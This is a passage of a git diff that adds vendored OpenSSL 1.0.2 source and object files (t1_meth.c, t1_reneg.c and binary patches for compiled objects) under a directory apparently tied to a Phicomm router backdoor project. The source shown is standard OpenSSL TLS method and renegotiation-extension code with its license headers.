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
Xa`iU`X~X6JfE0`HUH;1a=H~yu=^<-U

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_meth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_meth.c
new file mode 100644
index 0000000..335d57b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_meth.c
@@ -0,0 +1,84 @@
+/* ssl/t1_meth.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+static const SSL_METHOD *tls1_get_method(int ver)
+{
+    if (ver == TLS1_2_VERSION)
+        return TLSv1_2_method();
+    if (ver == TLS1_1_VERSION)
+        return TLSv1_1_method();
+    if (ver == TLS1_VERSION)
+        return TLSv1_method();
+    return NULL;
+}
+
+IMPLEMENT_tls_meth_func(TLS1_2_VERSION, TLSv1_2_method,
+                        ssl3_accept,
+                        ssl3_connect, tls1_get_method, TLSv1_2_enc_data)
+
+    IMPLEMENT_tls_meth_func(TLS1_1_VERSION, TLSv1_1_method,
+                        ssl3_accept,
+                        ssl3_connect, tls1_get_method, TLSv1_1_enc_data)
+
+    IMPLEMENT_tls_meth_func(TLS1_VERSION, TLSv1_method,
+                        ssl3_accept,
+                        ssl3_connect, tls1_get_method, TLSv1_enc_data)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_meth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_meth.o
new file mode 100644
index 0000000000000000000000000000000000000000..cb250d489d64855df108858b0f43c64e215c901d
GIT binary patch
literal 6152
zcmd^@O^g&p6vu0Jz+D9aQ4v9L7DYkbb_Ny^4>}2~>|vw$LE=Hv^!C*5Oql7O^whv&
z49dY|FD4t~fy9__G9EmTctPWV=mkA(;)R%)aO7r;i7|$_*6V&X^RHs+qQ|YI=e_r<
zdiB-+{+bVF=3W^qm4qoJ@sb!uh6*wJz|gPfZe45@Tf`q*_xwHk@kSyS*UDuf)V@JD
zM&XW&Yb9+NeoGB!x6XY310;HV-Ij9KbD=$4&xItlF3O2x$6l=LKQ-S^RKIdGI22T;
zYDfBcSi5kr8dRqb6u8)p4ccte2VHq5UOgqogt$h`Y?rxQOYglQN=w^HyEl(dtmq4y
zavsqKm7|5pS(W|Gz>be#Z##^`I}F`JHi+NX?x@h9Jn{}h+|1t2D(jxyvPpw6=*O&O
zx8^0<6}=%;ZWTrx);8ySb2I!k!?~T|6qfVd<q9xmF#*xgEsMK{0eEF`4@5(^EXIcc
zdyCp`*E2QiG3Vnf^BHbu_(#lNclakdrgQC<&omgtzwq!Y9{!z&|LEaAd-$&&PUm6N
zJpc6Yan`o3w#pt4f6l{S_VAM)-th3m!{7JtPd)rA5C6u)fAa8OJp4Bg|Hs33>Fa9L
zd71L?;~sv>!-cAa9jTf@EL6K!3m2uz<Fp~(ntStXEj-9!*oagV)TXDaN4Ta)OdErm
zT8(R{L*$2@zMKxMtYR98JXbhzTSi&oE@V=QUax&9jN({!RpG~JlE|2YOh%0Yccna2
zc;~W~;=Eq7uNvvOq^QVbA{SHDicB?tFmB42J1DlK*NYap8yY2?Kd)pDMnKSL^}3OY
zn_<+JnVF}`+C}qNErszQqTb_Hw<$B-gC16|HeX}6@8L3Ow35Z5QPS^lGEZgLTd`*i
zxe)c+DpakGO#6y=S|)LR(x{WLpXf%dL^i^+X{!+~^pjY%Qr@FDYPaX3_zX-qpT30)
zq13`bw?;VwAO?3{EyMh-eOv3D%8tV1j}N+=-{$xkm#-D2?sD#D&gC4N=jUKt?#Db)
zDE&TeOU7Jl#J2<A$v*M>fmeW=cK|~Bfj`JTnJRFzc0w-ze~5iDb@pjoGY3Mmz#nFx
z%t_$8fSY}we(0HP%4v3poA(q#P2i8RPo@ie5AY@6j{*M>cm?<}@JZk+!1n^b1pIN}
zmw`V4{7c~bfL{UrB=D=iNh_vYV~6(VDFd~=4tziGRp1AJ-vItJ@SDJm<_S&EfVz;e
z^a<S3CvZ!jz%6|OxAY0z(kF0BpTKwKGcJB+fm`|nZs`-arBC3NK7m{M1a9dQxTR0v
z6`21r@JZnGPEUo5rBC3NK7m{M1a9dQxTR0vmOg=7`UL)LKI7tN6}Y8O;FdmtTl(Zl
zP_?B`;FdmtTlxfU=@Yo6PvDk5fm`|nZs`-arBC3NK7m{M1a9dQxTR0vmOg=7`UGBq
z^SBIr68H-6y}&O4xAY0z(kF0BpTI4B0%tcL{TgsfpTMVJo~ytueFC@i2^{rV;XbLF
zo8)BL;pV$<*5NZ8zvFQ8-6w+H`HqU_wN+VRo5sszI|`IsQX-(2W)aNydLqba{t~Ud
zAWKCMr=5;WbgLv)GSL4jO!bt0*W!3F=?C2`?dmtk^PDZ4;X)R5B+u#pn2JuOYxgdv
zlRC%mI-G9<14`Eb{Yy|Ekiz+kKfTR!oW7eWcY@oQYml@<-2DgQb8hDvcYM01QJ?=c
z|9PD|YW&NZQ@Mqr(Q$<!l$!QOt$%q_(dg!QVQKvv_2I7nm}WG7RUcTEc|oXUsyFL5
zb`BWkf9-AvSDHN2mUK;1be1Wua(=}$WNYScu+k3o>E_?y{HAHh*3C~fAGLo?emI=w
zJla2!l*u>x88tSg)TvWlPO`mM`&;zk=F_*vsI6Mzh6~QZ-2J0x-l+WRJpT*29*dj*
EFUpgt=l}o!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_reneg.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_reneg.c
new file mode 100644
index 0000000..b9a35c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_reneg.c
@@ -0,0 +1,292 @@
+/* ssl/t1_reneg.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2009 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+/* Add the client's renegotiation binding */
+int ssl_add_clienthello_renegotiate_ext(SSL *s, unsigned char *p, int *len,
+                                        int maxlen)
+{
+    if (p) {
+        if ((s->s3->previous_client_finished_len + 1) > maxlen) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_RENEGOTIATE_EXT,
+                   SSL_R_RENEGOTIATE_EXT_TOO_LONG);
+            return 0;
+        }
+
+        /* Length byte */
+        *p = s->s3->previous_client_finished_len;
+        p++;
+
+        memcpy(p, s->s3->previous_client_finished,
+               s->s3->previous_client_finished_len);
+#ifdef OPENSSL_RI_DEBUG
+        fprintf(stderr, "%s RI extension sent by client\n",
+                s->s3->previous_client_finished_len ? "Non-empty" : "Empty");
+#endif
+    }
+
+    *len = s->s3->previous_client_finished_len + 1;
+
+    return 1;
+}
+
+/*
+ * Parse the client's renegotiation binding and abort if it's not right
+ */
+int ssl_parse_clienthello_renegotiate_ext(SSL *s, unsigned char *d, int len,
+                                          int *al)
+{
+    int ilen;
+
+    /* Parse the length byte */
+    if (len < 1) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_ENCODING_ERR);
+        *al = SSL_AD_ILLEGAL_PARAMETER;
+        return 0;
+    }
+    ilen = *d;
+    d++;
+
+    /* Consistency check */
+    if ((ilen + 1) != len) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_ENCODING_ERR);
+        *al = SSL_AD_ILLEGAL_PARAMETER;
+        return 0;
+    }
+
+    /* Check that the extension matches */
+    if (ilen != s->s3->previous_client_finished_len) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_MISMATCH);
+        *al = SSL_AD_HANDSHAKE_FAILURE;
+        return 0;
+    }
+
+    if (memcmp(d, s->s3->previous_client_finished,
+               s->s3->previous_client_finished_len)) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_MISMATCH);
+        *al = SSL_AD_HANDSHAKE_FAILURE;
+        return 0;
+    }
+#ifdef OPENSSL_RI_DEBUG
+    fprintf(stderr, "%s RI extension received by server\n",
+            ilen ? "Non-empty" : "Empty");
+#endif
+
+    s->s3->send_connection_binding = 1;
+
+    return 1;
+}
+
+/* Add the server's renegotiation binding */
+int ssl_add_serverhello_renegotiate_ext(SSL *s, unsigned char *p, int *len,
+                                        int maxlen)
+{
+    if (p) {
+        if ((s->s3->previous_client_finished_len +
+             s->s3->previous_server_finished_len + 1) > maxlen) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_RENEGOTIATE_EXT,
+                   SSL_R_RENEGOTIATE_EXT_TOO_LONG);
+            return 0;
+        }
+
+        /* Length byte */
+        *p = s->s3->previous_client_finished_len +
+            s->s3->previous_server_finished_len;
+        p++;
+
+        memcpy(p, s->s3->previous_client_finished,
+               s->s3->previous_client_finished_len);
+        p += s->s3->previous_client_finished_len;
+
+        memcpy(p, s->s3->previous_server_finished,
+               s->s3->previous_server_finished_len);
+#ifdef OPENSSL_RI_DEBUG
+        fprintf(stderr, "%s RI extension sent by server\n",
+                s->s3->previous_client_finished_len ? "Non-empty" : "Empty");
+#endif
+    }
+
+    *len = s->s3->previous_client_finished_len
+        + s->s3->previous_server_finished_len + 1;
+
+    return 1;
+}
+
+/*
+ * Parse the server's renegotiation binding and abort if it's not right
+ */
+int ssl_parse_serverhello_renegotiate_ext(SSL *s, unsigned char *d, int len,
+                                          int *al)
+{
+    int expected_len = s->s3->previous_client_finished_len
+        + s->s3->previous_server_finished_len;
+    int ilen;
+
+    /* Check for logic errors */
+    OPENSSL_assert(!expected_len || s->s3->previous_client_finished_len);
+    OPENSSL_assert(!expected_len || s->s3->previous_server_finished_len);
+
+    /* Parse the length byte */
+    if (len < 1) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_ENCODING_ERR);
+        *al = SSL_AD_ILLEGAL_PARAMETER;
+        return 0;
+    }
+    ilen = *d;
+    d++;
+
+    /* Consistency check */
+    if (ilen + 1 != len) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_ENCODING_ERR);
+        *al = SSL_AD_ILLEGAL_PARAMETER;
+        return 0;
+    }
+
+    /* Check that the extension matches */
+    if (ilen != expected_len) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_MISMATCH);
+        *al = SSL_AD_HANDSHAKE_FAILURE;
+        return 0;
+    }
+
+    if (memcmp(d, s->s3->previous_client_finished,
+               s->s3->previous_client_finished_len)) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_MISMATCH);
+        *al = SSL_AD_HANDSHAKE_FAILURE;
+        return 0;
+    }
+    d += s->s3->previous_client_finished_len;
+
+    if (memcmp(d, s->s3->previous_server_finished,
+               s->s3->previous_server_finished_len)) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT,
+               SSL_R_RENEGOTIATION_MISMATCH);
+        *al = SSL_AD_ILLEGAL_PARAMETER;
+        return 0;
+    }
+#ifdef OPENSSL_RI_DEBUG
+    fprintf(stderr, "%s RI extension received by client\n",
+            ilen ? "Non-empty" : "Empty");
+#endif
+    s->s3->send_connection_binding = 1;
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_reneg.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_reneg.o
new file mode 100644
